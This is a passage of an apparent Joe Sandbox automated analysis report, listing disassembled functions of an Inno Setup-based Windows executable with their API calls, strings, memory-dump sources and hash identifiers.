                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00457F00 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseDirectoryHandleSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2051275411-1862435767
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b643e5de385edbdcc6bab2e2ff9854c2f836b6f38382a1c8e34e12865b2a6b00
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b643e5de385edbdcc6bab2e2ff9854c2f836b6f38382a1c8e34e12865b2a6b00
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044D188 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                                                                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                                                                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 0044D212
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1005981011-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B67C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041B755
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(?), ref: 0041B761
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E98830$A570A6310E922Focus
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 184897721-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B94C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041BA27
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(?), ref: 0041BA33
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E98830$A570A6310E922Focus
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 184897721-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047C800 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-1421604804
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3029c443a8498c56a1c8d286568716a82b1e902b717456c5d6645635e99ed988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3029c443a8498c56a1c8d286568716a82b1e902b717456c5d6645635e99ed988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00495EC4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Deleting Uninstall data files.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1570157960-2568741658
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004704A4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                                                                                                                                                                                                                                                                                                  • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                                                                                                                                                                                                                                                                                                  • AddFontResource, xrefs: 0047055D
                                                                                                                                                                                                                                                                                                                                                                  • Failed to open Fonts registry key., xrefs: 00470529
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 955540645-649663873
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f568778fb6c734a0302aafbabb97131ab6cfbf139b6919693cc27d2514087333
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f568778fb6c734a0302aafbabb97131ab6cfbf139b6919693cc27d2514087333
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046319C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 004631CC
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Explorer
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2594429197-512347832
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004019CC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
